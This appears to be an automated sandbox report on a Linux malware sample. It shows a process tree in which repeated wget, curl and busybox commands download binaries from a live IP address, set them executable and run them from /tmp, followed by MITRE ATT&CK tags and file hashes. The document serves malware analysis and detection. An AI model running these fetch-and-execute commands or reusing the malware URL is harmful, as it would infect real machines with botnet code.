/bin/rmrm Uvhr7Ha4ybincBSBXNgrcpSKFU8o5z2Cpp2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:867
-
-
/bin/chmodchmod 777 I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- File and Directory Permissions Modification
PID:868
-
-
/tmp/I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ./I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵
- Executes dropped EXE
PID:869
-
-
/bin/rmrm I3tecjywG98NQuedtVn5ndM0Yc9iQZcafJ2⤵PID:870
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:871
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:872
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:873
-
-
/bin/chmodchmod 777 zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq./zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm zHROKIQSn7nghtfU2KQqMcsyqal8dOdSVq2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:877
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:878
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:879
-
-
/bin/chmodchmod 777 h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- File and Directory Permissions Modification
PID:880
-
-
/tmp/h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N./h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵
- Executes dropped EXE
PID:881
-
-
/bin/rmrm h6fbH1xYftFRann9zqGvm8qdOcaO3S3j0N2⤵PID:882
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:883
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:884
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:885
-
-
/bin/chmodchmod 777 tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- File and Directory Permissions Modification
PID:886
-
-
/tmp/tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj./tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵
- Executes dropped EXE
PID:887
-
-
/bin/rmrm tATX2JQJXyvA7uHU2A9jtb0s7JO00aqAhj2⤵PID:888
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:889
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:890
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:891
-
-
/bin/chmodchmod 777 nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- File and Directory Permissions Modification
PID:892
-
-
/tmp/nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp./nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵
- Executes dropped EXE
PID:893
-
-
/bin/rmrm nS5wnhhGyjlUBdPJM1ruXsG6V97XuCzCcp2⤵PID:894
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:895
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:896
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:897
-
-
/bin/chmodchmod 777 Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- File and Directory Permissions Modification
PID:898
-
-
/tmp/Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S./Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵
- Executes dropped EXE
PID:899
-
-
/bin/rmrm Q2NxjdlH0ybWpXJyJqquDbgd15ylsSgL5S2⤵PID:900
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/RiY3y8fPQopWc7h1K2fi5FGMinlGOFSPUA2⤵PID:901
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97